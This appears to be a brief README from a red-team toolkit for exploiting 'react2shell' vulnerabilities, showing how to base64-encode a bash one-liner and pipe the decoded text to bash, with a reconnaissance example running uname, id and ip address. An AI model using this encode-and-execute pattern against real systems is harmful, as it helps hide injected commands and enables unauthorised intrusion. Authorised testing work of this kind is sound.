Resources for red team operators to discover & exploit react2shell vulnerabilities. For authorized use only. I am not responsible for your actions.
echo “<bash one-liner>” | base64
echo “<base64 encoded one-liner>” | base64 -d | bash
echo "uname -a && id && ip address | grep -oP 'inet.*' " | base64
echo "dW5hbWUgLWEgJiYgaWQgJiYgaXAgYWRkcmVzcyB8ICBncmVwIC1vUCAnaW5ldC4qJyAK" | base64 -d | bash


